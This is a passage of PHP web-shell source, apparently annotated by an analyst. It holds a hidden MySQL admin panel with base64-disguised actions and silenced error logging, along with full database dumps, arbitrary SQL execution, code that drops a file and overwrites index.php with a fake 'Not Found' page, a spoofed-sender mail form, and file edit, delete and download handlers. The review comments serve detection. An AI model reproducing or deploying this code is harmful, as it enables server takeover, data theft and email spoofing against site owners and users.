  1364.         echo "'>Prev</a>\n";
  1365.     } else
  1366.         echo "<font size=2 class=\"new\">Prev</font>";
  1367.     echo " | ";
  1368.     if( $page < ($row/$rowperpage)-1 ) {
  1369.         if($action == "dmlld0RhdGE=")
  1370.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
  1371.         else
  1372.             echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
  1373.         if( $orderby != "" && $action == "dmlld0RhdGE=")
  1374.             echo "&orderby=$orderby";
  1375.         echo "'>Next</a>\n";
  1376.     } else
  1377.         echo "Next";
  1378.     echo " | ";
            // The jump-to-page box is shown only when there is more than one page.
  1379.     if( $row > $rowperpage ) {
  1380.         echo "<input type=text size=4 name=page>\n";
  1381.         echo "<input type=submit value='Go'>\n";
  1382.     }
  1383.     echo "</form>\n";
  1384.     echo "</font>\n";
  1385. }
  1386.  
  1387. function manageData( $cmd ) {
            // Renders the HTML form for inserting ($cmd == "add") or editing ($cmd == "edit")
            // one row of $tablename. For "edit" the current row is looked up first so the
            // inputs can be pre-filled. The form posts back with action addData_submit or
            // editData_submit.
            // NOTE(review): $dbname, $tablename and column names are written into HTML
            // attributes unquoted and unescaped; only the cell values pass through
            // htmlspecialchars().
  1388.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
  1389.     if( $cmd == "add" )
  1390.         echo "<h1>Add Data</h1>\n";
  1391.     else if( $cmd == "edit" ) {
  1392.         echo "<h1>Edit Data</h1>\n";
                // Build the WHERE clause from the primary-key columns. The values are read
                // from globals named after each column (presumably filled from the request
                // -- confirm); numeric columns are inserted bare, others in single quotes,
                // with no escaping in either case.
  1393.         $pResult = mysql_list_fields( $dbname, $tablename );
  1394.         $num = mysql_num_fields( $pResult );
  1395.         $key = "";
  1396.         for( $i = 0; $i < $num; $i++ ) {
  1397.             $field = mysql_fetch_field( $pResult, $i );
  1398.             if( $field->primary_key == 1 )
  1399.                 if( $field->numeric == 1 )
  1400.                     $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  1401.                 else
  1402.                     $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  1403.         }
                // Cut the trailing "AND " off the clause.
  1404.         $key = substr( $key, 0, strlen($key)-4 );
  1405.         mysql_select_db( $dbname, $mysqlHandle );
                // $queryStr is not in this function's global list, so this assignment is local.
  1406.         $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
  1407.         $data = mysql_fetch_array( $pResult );
  1408.     }
  1409.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  1410.     echo "<form action='$PHP_SELF' method=post>\n";
  1411.     if( $cmd == "add" )
  1412.         echo "<input type=hidden name=action value=addData_submit>\n";
  1413.     else if( $cmd == "edit" )
  1414.         echo "<input type=hidden name=action value=editData_submit>\n";
  1415.     echo "<input type=hidden name=dbname value=$dbname>\n";
  1416.     echo "<input type=hidden name=tablename value=$tablename>\n";
  1417.     echo "<table cellspacing=1 cellpadding=2>\n";
  1418.     echo "<tr>\n";
  1419.     echo "<th>Name</th>\n";
  1420.     echo "<th>Type</th>\n";
  1421.     echo "<th>Function</th>\n";
  1422.     echo "<th>Data</th>\n";
  1423.     echo "</tr>\n";
            // Two metadata reads: SHOW fields supplies name and type per column,
            // mysql_list_fields() supplies the length used for maxlength and widget choice.
  1424.     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  1425.     $num = mysql_num_rows( $pResult );
  1426.     $pResultLen = mysql_list_fields( $dbname, $tablename );
  1427.     for( $i = 0; $i < $num; $i++ ) {
  1428.         $field = mysql_fetch_array( $pResult );
  1429.         $fieldname = $field["Field"];
  1430.         $fieldtype = $field["Type"];
  1431.         $len = mysql_field_len( $pResultLen, $i );
  1432.         echo "<tr>";
  1433.         echo "<td>$fieldname</td>";
  1434.         echo "<td>".$field["Type"]."</td>";
  1435.         echo "<td>\n";
                // Per-column "<column>_function" selector: the chosen SQL function name is
                // read back by manageData_submit(), which wraps the value in it.
  1436.         echo "<select name=${fieldname}_function>\n";
  1437.         echo "<option>\n";
  1438.         echo "<option>ASCII\n";
  1439.         echo "<option>CHAR\n";
  1440.         echo "<option>SOUNDEX\n";
  1441.         echo "<option>CURDATE\n";
  1442.         echo "<option>CURTIME\n";
  1443.         echo "<option>FROM_DAYS\n";
  1444.         echo "<option>FROM_UNIXTIME\n";
  1445.         echo "<option>NOW\n";
  1446.         echo "<option>PASSWORD\n";
  1447.         echo "<option>PERIOD_ADD\n";
  1448.         echo "<option>PERIOD_DIFF\n";
  1449.         echo "<option>TO_DAYS\n";
  1450.         echo "<option>USER\n";
  1451.         echo "<option>WEEKDAY\n";
  1452.         echo "<option>RAND\n";
  1453.         echo "</select>\n";
  1454.         echo "</td>\n";
                // $data is assigned only in the "edit" branch above; it is indexed by
                // column position here.
  1455.         $value = htmlspecialchars($data[$i]);
  1456.         if( $cmd == "add" ) {
                    // The first strtok() call takes the type name off the front of the
                    // column definition (delimiters: space, parentheses, comma, newline).
  1457.             $type = strtok( $fieldtype, " (,)\n" );
  1458.             if( $type == "enum" || $type == "set" ) {
  1459.                 echo "<td>\n";
  1460.                 if( $type == "enum" )
  1461.                     echo "<select name=$fieldname>\n";
  1462.                 else if( $type == "set" )
  1463.                     echo "<select name=$fieldname size=4 multiple>\n";
                        // Continue tokenising the same string on single quotes: each
                        // iteration yields one member; the second call discards the
                        // separator that sits between two quoted members.
  1464.                 while( $str = strtok( "'" ) ) {
  1465.                     echo "<option>$str\n";
  1466.                     strtok( "'" );
  1467.                 }
  1468.                 echo "</select>\n";
  1469.                 echo "</td>\n";
  1470.             } else {
                        // Short columns get a text input, longer ones a textarea.
  1471.                 if( $len < 40 )
  1472.                     echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
  1473.                 else
  1474.                     echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
  1475.             }
  1476.         } else if( $cmd == "edit" ) {
                    // Same widgets as the "add" branch, pre-filled with the escaped value.
  1477.             $type = strtok( $fieldtype, " (,)\n" );
  1478.             if( $type == "enum" || $type == "set" ) {
  1479.                 echo "<td>\n";
  1480.                 if( $type == "enum" )
  1481.                     echo "<select name=$fieldname>\n";
  1482.                 else if( $type == "set" )
  1483.                     echo "<select name=$fieldname size=4 multiple>\n";
  1484.                 while( $str = strtok( "'" ) ) {
                            // Only an exact match with the whole stored value is marked
                            // selected.
  1485.                     if( $value == $str )
  1486.                         echo "<option selected>$str\n";
  1487.                     else
  1488.                         echo "<option>$str\n";
  1489.                     strtok( "'" );
  1490.                 }
  1491.                 echo "</select>\n";
  1492.                 echo "</td>\n";
  1493.             } else {
  1494.                 if( $len < 40 )
  1495.                     echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
  1496.                 else
  1497.                     echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
  1498.             }
  1499.         }
  1500.         echo "</tr>";
  1501.     }
  1502.     echo "</table><p>\n";
  1503.     if( $cmd == "add" )
  1504.         echo "<input type=submit value='Add Data'>\n";
  1505.     else if( $cmd == "edit" )
  1506.         echo "<input type=submit value='Edit Data'>\n";
  1507.     echo "<input type=button value='Cancel' onClick='history.back()'>\n";
  1508.     echo "</form>\n";
  1509. }
  1510.  
  1511. function manageData_submit( $cmd ) {
            // Writes one row: INSERT INTO for $cmd == "add", REPLACE INTO for "edit".
            // The VALUES list is positional -- one entry per table column in the order
            // mysql_list_fields() reports them -- and each value is read from the global
            // named after the column. Afterwards the table is re-displayed via viewData("").
            // NOTE(review): numeric values are inserted bare and all other values between
            // single quotes, with no escaping; the optional wrapper function name comes
            // from the "<column>_function" global and is not checked against the option
            // list that manageData() renders.
  1512.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1513.     $pResult = mysql_list_fields( $dbname, $tablename );
  1514.     $num = mysql_num_fields( $pResult );
  1515.     mysql_select_db( $dbname, $mysqlHandle );
  1516.     if( $cmd == "add" )
  1517.         $queryStr = "INSERT INTO $tablename VALUES (";
  1518.     else if( $cmd == "edit" )
  1519.         $queryStr = "REPLACE INTO $tablename VALUES (";
            // All columns except the last: each entry ends with a comma.
  1520.     for( $i = 0; $i < $num-1; $i++ ) {
  1521.         $field = mysql_fetch_field( $pResult );
  1522.         $func = $GLOBALS[$field->name."_function"];
  1523.         if( $func != "" )
  1524.             $queryStr .= " $func(";
  1525.         if( $field->numeric == 1 ) {
  1526.             $queryStr .= $GLOBALS[$field->name];
  1527.             if( $func != "" )
  1528.                 $queryStr .= "),";
  1529.             else
  1530.                 $queryStr .= ",";
  1531.         } else {
  1532.             $queryStr .= "'" . $GLOBALS[$field->name];
  1533.             if( $func != "" )
  1534.                 $queryStr .= "'),";
  1535.             else
  1536.                 $queryStr .= "',";
  1537.         }
  1538.     }
            // Last column: closes the VALUES list. Its "<column>_function" selection is
            // not read, so this value is never wrapped in a function.
  1539.     $field = mysql_fetch_field( $pResult );
  1540.     if( $field->numeric == 1 )
  1541.         $queryStr .= $GLOBALS[$field->name] . ")";
  1542.     else
  1543.         $queryStr .= "'" . $GLOBALS[$field->name] . "')";
  1544.     mysql_query( $queryStr , $mysqlHandle );
  1545.     $errMsg = mysql_error();
  1546.     viewData( "" );
  1547. }
  1548.  
  1549. function deleteData() {
            // Deletes the row(s) of $tablename matching the primary-key values found in
            // the globals named after each key column, records the statement and error
            // text in $queryStr / $errMsg, then re-displays the table via viewData("").
            // NOTE(review): key values are concatenated unescaped (numeric bare, others
            // single-quoted). If the table reports no primary-key column, $key stays empty
            // and the statement is sent as "DELETE FROM <table> WHERE " with no condition.
  1550.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1551.     $pResult = mysql_list_fields( $dbname, $tablename );
  1552.     $num = mysql_num_fields( $pResult );
  1553.     $key = "";
  1554.     for( $i = 0; $i < $num; $i++ ) {
  1555.         $field = mysql_fetch_field( $pResult, $i );
  1556.         if( $field->primary_key == 1 )
  1557.             if( $field->numeric == 1 )
  1558.                 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  1559.             else
  1560.                 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  1561.     }
            // Cut the trailing "AND " off the clause.
  1562.     $key = substr( $key, 0, strlen($key)-4 );
  1563.     mysql_select_db( $dbname, $mysqlHandle );
  1564.     $queryStr =  "DELETE FROM $tablename WHERE $key";
  1565.     mysql_query( $queryStr, $mysqlHandle );
  1566.     $errMsg = mysql_error();
  1567.     viewData( "" );
  1568. }
  1569.  
  1570. function fetch_table_dump_sql($table)
  1571. {
            // Echoes a SQL dump of one table to the response: a DROP TABLE IF EXISTS line,
            // the SHOW CREATE TABLE text, then one INSERT statement per row.
            // $table: table name, interpolated into the statements as-is.
            // Returns nothing; rows are echoed one at a time rather than collected, so the
            // whole table is streamed to the client.
  1572.     global $mysqlHandle,$dbname;
  1573.     mysql_select_db( $dbname, $mysqlHandle );
  1574.     $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
  1575.     $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
  1576.     $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
  1577.     echo $tabledump;
  1578.     // get data
  1579.     $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
  1580.     $numfields=mysql_num_fields($rows);
  1581.     while ($row = mysql_fetch_array($rows, MYSQL_NUM))
  1582.     {
  1583.         $tabledump = "INSERT INTO $table VALUES(";
                // $fieldcounter starts at -1 because the loop pre-increments it;
                // $firstfield suppresses the ", " separator before the first value.
  1584.         $fieldcounter = -1;
  1585.         $firstfield = 1;
  1586.         // get each field's data
  1587.         while (++$fieldcounter < $numfields)
  1588.         {
  1589.             if (!$firstfield)
  1590.             {
  1591.                 $tabledump .= ', ';
  1592.             }
  1593.             else
  1594.             {
  1595.                 $firstfield = 0;
  1596.             }
                    // Unset (NULL) columns are written as the keyword NULL; everything
                    // else, numbers included, is escaped and single-quoted.
  1597.             if (!isset($row["$fieldcounter"]))
  1598.             {
  1599.                 $tabledump .= 'NULL';
  1600.             }
  1601.             else
  1602.             {
  1603.                 $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
  1604.             }
  1605.         }
  1606.         $tabledump .= ");\n";
  1607.         echo $tabledump;
  1608.     }
            // The @ suppresses any warning from freeing the result.
  1609.     @mysql_free_result($rows);
  1610. }
  1611.  
  1612. function dump() {
            // Sends a SQL dump as the response and ends the request with exit.
            // $action == "dumpTable" exports the single table $tablename; any other value
            // exports every table that SHOW tables lists for $dbname.
            // NOTE(review): this is the bulk data-export path of the tool. The response
            // carries "Content-type: unknown/unknown", a "Content-disposition: filename=...sql"
            // header built from the raw $tablename / $dbname, and the literal
            // "### ... DUMP COMPLETED ###" trailers -- all usable as match strings when
            // reviewing proxy or web-server captures.
  1613.     global $mysqlHandle, $action, $dbname, $tablename;
  1614.     if( $action == "dumpTable" ){
  1615.         header("Content-disposition: filename=$tablename.sql");
  1616.         header('Content-type: unknown/unknown');
  1617.         fetch_table_dump_sql($tablename);
  1618.         echo "\n\n\n";
  1619.         echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
  1620.         exit;
  1621.     }else{
  1622.         header("Content-disposition: filename=$dbname.sql");
  1623.         header('Content-type: unknown/unknown');
  1624.         mysql_select_db( $dbname, $mysqlHandle );
  1625.         $query_id = mysql_query("SHOW tables",$mysqlHandle);
                // One fetch_table_dump_sql() call per table name in the first result column.
  1626.         while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
  1627.         {
  1628.                 fetch_table_dump_sql($row[0]);
  1629.                 echo "\n\n\n";
  1630.                 echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
  1631.                 echo "\n\n\n";
  1632.         }
  1633.         echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
  1634.         exit;
  1635.     }
  1636. }
  1637.  
  1638. function utils() {
            // "Utilities" page. With an empty $command, or one starting with "flush", it
            // prints the Show/Flush menu and runs the matching FLUSH statement, reporting
            // "- Success" or "- Fail" next to that entry. Any other $command is turned
            // into SQL by replacing underscores with spaces and executed, and its result
            // set is rendered as an HTML table.
            // NOTE(review): the menu links only show_status, show_variables and
            // show_processlist, but the else branch applies no allow-list -- whatever the
            // global $command holds is sent to the server. The queries use the default
            // connection (no link argument is passed to mysql_query()).
  1639.     global $PHP_SELF, $command;
  1640.     echo "<h1>Utilities</h1>\n";
  1641.     if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
  1642.         echo "<hr>\n";
  1643.         echo "Show\n";
  1644.         echo "<ul>\n";
  1645.         echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
  1646.         echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
  1647.         echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
  1648.         echo "</ul>\n";
  1649.         echo "Flush\n";
  1650.         echo "<ul>\n";
                // Each entry below prints its link, then runs its FLUSH statement only when
                // $command names exactly that entry.
  1651.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
  1652.         if( $command == "flush_hosts" ) {
  1653.             if( mysql_query( "Flush hosts" ) != false )
  1654.                 echo "- Success";
  1655.             else
  1656.                 echo "- Fail";
  1657.         }
  1658.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
  1659.         if( $command == "flush_logs" ) {
  1660.             if( mysql_query( "Flush logs" ) != false )
  1661.                 echo "- Success";
  1662.             else
  1663.                 echo "- Fail";
  1664.         }
  1665.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
  1666.         if( $command == "flush_privileges" ) {
  1667.             if( mysql_query( "Flush privileges" ) != false )
  1668.                 echo "- Success";
  1669.             else
  1670.                 echo "- Fail";
  1671.         }
  1672.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
  1673.         if( $command == "flush_tables" ) {
  1674.             if( mysql_query( "Flush tables" ) != false )
  1675.                 echo "- Success";
  1676.             else
  1677.                 echo "- Fail";
  1678.         }
  1679.         echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
  1680.         if( $command == "flush_status" ) {
  1681.             if( mysql_query( "Flush status" ) != false )
  1682.                 echo "- Success";
  1683.             else
  1684.                 echo "- Fail";
  1685.         }
  1686.         echo "</ul>\n";
  1687.     } else {
                // "show_status" becomes "show status", and so on; $queryStr is local here.
  1688.         $queryStr = ereg_replace( "_", " ", $command );
  1689.         $pResult = mysql_query( $queryStr );
  1690.         if( $pResult == false ) {
  1691.             echo "Fail";
  1692.             return;
  1693.         }
  1694.         $col = mysql_num_fields( $pResult );
                // The executed text is echoed back unescaped; result cells are escaped below.
  1695.         echo "<p class=location>$queryStr</p>\n";
  1696.         echo "<hr>\n";
  1697.         echo "<table cellspacing=1 cellpadding=2 border=0>\n";
  1698.         echo "<tr>\n";
  1699.         for( $i = 0; $i < $col; $i++ ) {
  1700.             $field = mysql_fetch_field( $pResult, $i );
  1701.             echo "<th>".$field->name."</th>\n";
  1702.         }
  1703.         echo "</tr>\n";
                // Emit every row until mysql_fetch_row() reports the end of the result.
  1704.         while( 1 ) {
  1705.             $rowArray = mysql_fetch_row( $pResult );
  1706.             if( $rowArray == false ) break;
  1707.             echo "<tr>\n";
  1708.             for( $j = 0; $j < $col; $j++ )
  1709.                 echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
  1710.             echo "</tr>\n";
  1711.         }
  1712.         echo "</table>\n";
  1713.     }
  1714. }
  1715. function footer_html() {
            // Prints the page footer: the current $USERNAME and navigation links to the
            // database list, the table list (only when $tablename is set), the utilities
            // page and logout.
            // NOTE(review): the action value "bGlzdERCcw==" is the base64 encoding of
            // "listDBs"; it is emitted and compared in encoded form elsewhere in the file.
            // $USERNAME, $dbname and $tablename are echoed without HTML escaping.
  1716.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
  1717.     echo "<hr>\n";
  1718.     echo "<span class=\"new\">[$USERNAME]</span> - \n";
  1719.     echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
  1720.     if( $tablename != "" )
  1721.         echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
  1722.     echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
  1723.     echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
  1724. }
  1725. //------------- MAIN ------------- //
        // Entry point of the embedded MySQL admin panel: silences PHP error output
        // and logging, then dispatches on $action.
        // NOTE(review): $action, $queryStr and $PHP_SELF are not assigned in the
        // visible lines; presumably they are populated from the request earlier in
        // the file (register_globals-style) -- confirm against the part above.
        //
        // Analyst note: with display_errors and log_errors both off, failures here
        // leave nothing in the PHP error log; the web-server access log and file
        // integrity monitoring are the places to look.
  1726. error_reporting(0);
  1727. ini_set ('display_errors', 0);
  1728. ini_set ('log_errors', 0);
        // "logon", an empty action and "logout" all show the logon form.
  1729. if( $action == "logon" || $action == "" || $action == "logout" )
  1730.     logon();
        // "bG9nb25fc3VibWl0" is base64 for "logon_submit".
  1731. else if( $action == "bG9nb25fc3VibWl0" )
  1732.     logon_submit();
  1733. else if( $action == "dumpTable" || $action == "dumpDB" ) {
            // The MySQL user, password and host are taken from three cookies.
            // NOTE(review): $hxxp_COOKIE_VARS looks like the paste's defanged
            // spelling of $HTTP_COOKIE_VARS (HEAD shows the same hxxp_ substitution
            // in other names) -- confirm against an untouched sample.
            // The cookie names are fixed strings and can serve as a match pattern
            // wherever request cookies are logged or inspected.
  1734.     while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
  1735.         if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
  1736.         if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
  1737.         if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
  1738.     }
            // The connection result is not checked in this branch before dump() runs.
  1739.     $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
  1740.     dump();
  1741. } else {
            // Every other action: same cookie-to-credential copy as the dump branch.
  1742.     while( list($var, $value) = each($hxxp_COOKIE_VARS) ) {
  1743.         if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
  1744.         if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
  1745.         if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
  1746.     }
            // The connect call is wrapped in an HTML comment so anything printed
            // while connecting is hidden from the rendered page; "@" additionally
            // suppresses PHP's own error message.
  1747.     echo "<!--";
  1748.     $mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
  1749.     echo "-->";
            // Any connection failure is reported as "Wrong Password!", whatever the
            // actual cause.
  1750.     if( $mysqlHandle == false ) {
  1751.         echo "<table width=100% height=100%><tr><td><center>\n";
  1752.         echo "<h1>Wrong Password!</h1>\n";
  1753.         echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
  1754.         echo "</center></td></tr></table>\n";
  1755.     } else {
                // Action dispatch. An $action matching none of the strings below
                // runs no handler; the connection is still closed and the footer
                // printed. "bGlzdERCcw==" is base64 for "listDBs".
  1756.         if( $action == "bGlzdERCcw==" )
  1757.             listDatabases();
  1758.         else if( $action == "createDB" )
  1759.             createDatabase();
  1760.         else if( $action == "dropDB" )
  1761.             dropDatabase();
  1762.         else if( $action == "listTables" )
  1763.             listTables();
  1764.         else if( $action == "createTable" )
  1765.             createTable();
  1766.         else if( $action == "dropTable" )
  1767.             dropTable();
  1768.         else if( $action == "viewSchema" )
  1769.             viewSchema();
                // "query" passes $queryStr to viewData(); where $queryStr is set is
                // not visible here.
  1770.         else if( $action == "query" )
  1771.             viewData( $queryStr );
  1772.         else if( $action == "addField" )
  1773.             manageField( "add" );
  1774.         else if( $action == "addField_submit" )
  1775.             manageField_submit( "add" );
  1776.         else if( $action == "editField" )
  1777.             manageField( "edit" );
  1778.         else if( $action == "editField_submit" )
  1779.             manageField_submit( "edit" );
  1780.         else if( $action == "dropField" )
  1781.             dropField();
                // "dmlld0RhdGE=" is base64 for "viewData".
  1782.         else if( $action == "dmlld0RhdGE=" )
  1783.             viewData( "" );
  1784.         else if( $action == "addData" )
  1785.             manageData( "add" );
  1786.         else if( $action == "addData_submit" )
  1787.             manageData_submit( "add" );
  1788.         else if( $action == "editData" )
  1789.             manageData( "edit" );
  1790.         else if( $action == "editData_submit" )
  1791.             manageData_submit( "edit" );
  1792.         else if( $action == "deleteData" )
  1793.             deleteData();
  1794.         else if( $action == "utils" )
  1795.             utils();
  1796.         mysql_close( $mysqlHandle);
  1797.         footer_html();
  1798.     }
  1799. }
  1800. ?>
  1801. <html>
  1802. <head>
  1803. <title>MySQL Interface (Developed By Mohajer22)</title>
  1804. <body bgColor=#000000 >
  1805. <style type="text/css">
  1806. <!--
  1807. p.location {
  1808.     color: #00FF00;
  1809. }
  1810. h1, h2, h3 {
  1811.     color: #00FF00;
  1812. }
  1813. th {
  1814.     background-color: #222222;
  1815.     color: #00FF00;
  1816.     font-size: small;
  1817. }
  1818. td {
  1819.     color: #00FF00;
  1820.     background-color: #444444;
  1821.     font-size: small;
  1822. }
  1823. form {
  1824.     margin-top: 0;
  1825.     margin-bottom: 0;
  1826. }
  1827. a {
  1828.     text-decoration:none;
  1829.     color: #00FF00;
  1830.     font-size:small;
  1831. }
  1832. A:link {
  1833. COLOR:#FFFFFF;
  1834. TEXT-DECORATION: none
  1835. }
  1836. A:visited {
  1837. COLOR:#00FF00;
  1838. TEXT-DECORATION: none
  1839. }
  1840. A:active {
  1841. COLOR:#00FF00;
  1842. TEXT-DECORATION: none
  1843. }
  1844. A:hover {
  1845. color:#00FF00;
  1846. TEXT-DECORATION: none
  1847. }
  1848. input, select, textarea {
  1849. background-color: #000000;
  1850. border-style: solid;
  1851. font-family: Tahoma,Verdana,Arial,Sans-Serif;
  1852. font-size:small;
  1853. color: #00FF00;
  1854. padding: 0px;
  1855. }
  1856. li {
  1857. color: #00FF00;
  1858. }
  1859. .new {
  1860. color: #00FF00;
  1861. }
  1862. //-->
  1863. </style>
  1864. </head>'; $file = fopen("db-sql.php" ,"w+"); $write = fwrite ($file ,base64_decode($sqlshell)); fclose($file); chmod("db-sql.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = '<h1>Not Found</h1>
  1865. <p>The requested URL was not found on this server.</p>
  1866. <hr>
  1867. <address>Apache Server at <?=$_SERVER['hxxp_HOST']?> Port 80</address>
  1868.     <style>
  1869.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  1870.     </style>'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell); echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?>
  1871. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1872. <table class="cmdbox">
  1873. <tr><td>
  1874. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me A.S.A.P</textarea>
  1875. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr>
  1876. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="BlackEagle@fbi.gov" name="mail_from" />&nbsp; from</td></tr>
  1877. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
  1878. <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
  1879. <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
  1880. </table>
  1881. </form>
  1882.  
  1883. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  1884.     <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  1885.     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  1886.         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1887.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1888.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1889.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  1890.     </form>
  1891.     </td></tr>
  1892.     <tr><td>Size</td><td>".ukuran($file)."</td></tr>
  1893.     <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
  1894.     <tr><td>Owner</td><td>".$owner."</td></tr>
  1895.     <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  1896.     <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  1897.     <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  1898.     <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  1899.     <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
  1900.     </table>
